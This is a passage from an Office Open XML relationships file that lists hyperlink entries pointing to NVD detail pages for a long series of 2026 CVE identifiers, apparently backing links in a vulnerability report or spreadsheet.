Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69322" TargetMode="External" Id="rId692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69332" TargetMode="External" Id="rId693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69346" TargetMode="External" Id="rId694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69365" TargetMode="External" Id="rId695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69371" TargetMode="External" Id="rId696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69412" TargetMode="External" Id="rId697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69418" TargetMode="External" Id="rId698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69423" TargetMode="External" Id="rId699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69427" TargetMode="External" Id="rId700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69458" TargetMode="External" Id="rId701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69462" TargetMode="External" Id="rId702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69481" TargetMode="External" Id="rId703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69503" TargetMode="External" Id="rId704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69505" TargetMode="External" Id="rId705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69512" TargetMode="External" Id="rId706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69619" TargetMode="External" Id="rId707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69623" TargetMode="External" Id="rId708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69625" TargetMode="External" Id="rId709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69643" TargetMode="External" Id="rId710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69681" TargetMode="External" Id="rId711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69689" TargetMode="External" Id="rId712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69714" TargetMode="External" Id="rId713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69717" TargetMode="External" Id="rId714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69727" TargetMode="External" Id="rId715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69762" TargetMode="External" Id="rId716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69773" TargetMode="External" Id="rId717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69777" TargetMode="External" Id="rId718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69807" TargetMode="External" Id="rId719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69826" TargetMode="External" Id="rId720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69847" TargetMode="External" Id="rId721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69875" TargetMode="External" Id="rId722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69876" TargetMode="External" Id="rId723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76139" TargetMode="External" Id="rId724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83948" TargetMode="External" Id="rId725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84934" TargetMode="External" Id="rId726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84935" TargetMode="External" Id="rId727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82636" TargetMode="External" Id="rId728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85649" TargetMode="External" Id="rId729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0065" TargetMode="External" Id="rId730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0084" TargetMode="External" Id="rId731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18444" TargetMode="External" Id="rId732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18445" TargetMode="External" Id="rId733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28572" TargetMode="External" Id="rId734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28583" TargetMode="External" Id="rId735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28590" TargetMode="External" Id="rId736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28593" TargetMode="External" Id="rId737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28594" TargetMode="External" Id="rId738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28599" TargetMode="External" Id="rId739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28600" TargetMode="External" Id="rId740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28602" TargetMode="External" Id="rId741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28603" TargetMode="External" Id="rId742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28607" TargetMode="External" Id="rId743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28611" TargetMode="External" Id="rId744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28612" TargetMode="External" Id="rId745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28614" TargetMode="External" Id="rId746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28616" TargetMode="External" Id="rId747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28620" TargetMode="External" Id="rId748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28624" TargetMode="External" Id="rId749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28631" TargetMode="External" Id="rId750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28634" TargetMode="External" Id="rId751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28636" TargetMode="External" Id="rId752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28639" TargetMode="External" Id="rId753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28642" TargetMode="External" Id="rId754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28644" TargetMode="External" Id="rId755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28650" TargetMode="External" Id="rId756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28653" TargetMode="External" Id="rId757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28655" TargetMode="External" Id="rId758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28657" TargetMode="External" Id="rId759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28658" TargetMode="External" Id="rId760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28659" TargetMode="External" Id="rId761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28663" TargetMode="External" Id="rId762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28664" TargetMode="External" Id="rId763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28668" TargetMode="External" Id="rId764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45515" TargetMode="External" Id="rId765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45520" TargetMode="External" Id="rId766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45531" TargetMode="External" Id="rId767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49881" TargetMode="External" Id="rId768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49884" TargetMode="External" Id="rId769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49887" TargetMode="External" Id="rId770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49918" TargetMode="External" Id="rId771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49919" TargetMode="External" Id="rId772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49927" TargetMode="External" Id="rId773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49932" TargetMode="External" Id="rId774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55273" TargetMode="External" Id="rId775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55285" TargetMode="External" Id="rId776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55294" TargetMode="External" Id="rId777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56172" TargetMode="External" Id="rId778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56177" TargetMode="External" Id="rId779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56198" TargetMode="External" Id="rId780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5729" TargetMode="External" Id="rId781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58599" TargetMode="External" Id="rId782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58600" TargetMode="External" Id="rId783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58611" TargetMode="External" Id="rId784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58820" TargetMode="External" Id="rId785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58823" TargetMode="External" Id="rId786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58839" TargetMode="External" Id="rId787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58846" TargetMode="External" Id="rId788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58874" TargetMode="External" Id="rId789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58941" TargetMode="External" Id="rId790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62697" TargetMode="External" Id="rId791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62804" TargetMode="External" Id="rId792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62810" TargetMode="External" Id="rId793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68787" TargetMode="External" Id="rId794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68832" TargetMode="External" Id="rId795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68841" TargetMode="External" Id="rId796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68844" TargetMode="External" Id="rId797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68845" TargetMode="External" Id="rId798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68848" TargetMode="External" Id="rId799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68850" TargetMode="External" Id="rId800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68875" TargetMode="External" Id="rId801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68877" TargetMode="External" Id="rId802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68885" TargetMode="External" Id="rId803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68888" TargetMode="External" Id="rId804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68890" TargetMode="External" Id="rId805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68892" TargetMode="External" Id="rId806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68896" TargetMode="External" Id="rId807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69265" TargetMode="External" Id="rId808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69269" TargetMode="External" Id="rId809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69270" TargetMode="External" Id="rId810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69277" TargetMode="External" Id="rId811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69283" TargetMode="External" Id="rId812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69284" TargetMode="External" Id="rId813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69289" TargetMode="External" Id="rId814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69290" TargetMode="External" Id="rId815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69293" TargetMode="External" Id="rId816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69295" TargetMode="External" Id="rId817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69298" TargetMode="External" Id="rId818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69307" TargetMode="External" Id="rId819" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69312" TargetMode="External" Id="rId820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69323" TargetMode="External" Id="rId821" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69324" TargetMode="External" Id="rId822" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69328" TargetMode="External" Id="rId823" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69348" TargetMode="External" Id="rId824" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69352" TargetMode="External" Id="rId825" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69359" TargetMode="External" Id="rId826" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69368" TargetMode="External" Id="rId827" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69377" TargetMode="External" Id="rId828" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69389" TargetMode="External" Id="rId829" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69391" TargetMode="External" Id="rId830" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69392" TargetMode="External" Id="rId831" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69407" TargetMode="External" Id="rId832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69420" TargetMode="External" Id="rId833" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69421" TargetMode="External" Id="rId834" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69424" TargetMode="External" Id="rId835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69426" TargetMode="External" Id="rId836" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69432" TargetMode="External" Id="rId837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69433" TargetMode="External" Id="rId838" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69436" TargetMode="External" Id="rId839" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69444" TargetMode="External" Id="rId840" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69445" TargetMode="External" Id="rId841" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69447" TargetMode="External" Id="rId842" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69450" TargetMode="External" Id="rId843" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69455" TargetMode="External" Id="rId844" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69456" TargetMode="External" Id="rId845" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69459" TargetMode="External" Id="rId846" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69467" TargetMode="External" Id="rId847" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69475" TargetMode="External" Id="rId848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69476" TargetMode="External" Id="rId849" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69478" TargetMode="External" Id="rId850" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69480" TargetMode="External" Id="rId851" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69489" TargetMode="External" Id="rId852" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69508" TargetMode="External" Id="rId853" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69509" TargetMode="External" Id="rId854" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69513" TargetMode="External" Id="rId855" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69528" TargetMode="External" Id="rId856" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69532" TargetMode="External" Id="rId857" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 